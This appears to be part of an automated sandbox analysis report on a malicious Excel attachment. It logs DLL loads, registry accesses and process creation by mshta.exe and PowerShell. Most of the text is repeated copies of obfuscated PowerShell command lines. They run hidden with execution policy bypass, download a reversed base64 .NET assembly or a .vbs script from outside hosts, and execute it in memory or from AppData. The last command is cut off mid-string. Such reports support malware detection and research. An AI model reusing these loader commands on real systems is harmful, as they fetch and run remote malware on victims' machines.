Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: atl.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdbhP source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdb source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdb source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdbhP source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp

Source: A & C Metrology OC 545714677889Materiale.xls

Initial sample: OLE indicators vbamacros = False

Source: A & C Metrology OC 545714677889Materiale.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydC